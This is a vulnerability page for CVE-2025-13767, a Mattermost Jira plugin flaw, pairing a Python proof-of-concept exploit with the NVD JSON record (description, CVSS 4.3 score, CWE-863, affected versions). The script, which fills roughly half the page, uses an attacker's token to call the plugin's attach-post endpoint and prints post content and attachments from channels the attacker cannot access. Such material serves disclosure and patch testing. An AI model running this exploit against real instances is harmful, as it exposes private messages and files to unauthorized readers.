CVE-2025-13767

# CVE-2025-13767 PoC - Mattermost Jira Plugin Unauthorized Access # This PoC demonstrates the access control bypass in Mattermost Jira plugin import requests import json TARGET_URL = "https://your-mattermost-instance.com" ATTACKER_TOKEN = "your-authentication-token" CHANNEL_ID = "target-channel-id" # Channel attacker doesn't have access to POST_ID = "target-post-id" # Post ID from restricted channel def exploit_unauthorized_access(): """ Exploit the missing channel membership validation in Jira plugin """ headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Step 1: Attempt to attach post to Jira issue without channel membership exploit_data = { "post_id": POST_ID, "channel_id": CHANNEL_ID, "jira_issue_key": "PROJECT-123" } response = requests.post( f"{TARGET_URL}/api/v4/plugins/com.mattermost.jira/api/v2/attach-post", headers=headers, json=exploit_data ) # If successful, the post content and attachments are exposed if response.status_code == 200: data = response.json() print(f"[+] Successfully accessed post: {data.get('post_id')}") print(f"[+] Post content: {data.get('message')}") print(f"[+] Attachments: {data.get('attachments')}") else: print(f"[-] Exploit failed: {response.status_code}") if __name__ == "__main__": exploit_unauthorized_access()

{"cve": {"id": "CVE-2025-13767", "sourceIdentifier": "[email protected]", "published": "2025-12-24T08:15:45.553", "lastModified": "2025-12-31T18:56:27.667", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 11.1.x <= 11.1.0, 11.0.x <= 11.0.5, 10.12.x <= 10.12.3, 10.11.x <= 10.11.7 fails to validate user channel membership when attaching Mattermost posts as comments to Jira issues, which allows an authenticated attacker with access to the Jira plugin to read post content and attachments from channels they do not have access to."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.8", "matchCriteriaId": "7B0477E2-8999-4E1D-9E6B-7A818CB76488"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.12.0", "versionEndExcluding": "10.12.4", "matchCriteriaId": "B83EB4C3-5E75-4BD1-94F3-ED29D329E5C4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.6", "matchCriteriaId": "B6EAC2A0-B481-45EA-90AE-F950921DB06A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.1.0", "versionEndExcluding": "11.1.1", "matchCriteriaId": "387573EC-2596-4529-BD43-054E52D34EC0"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}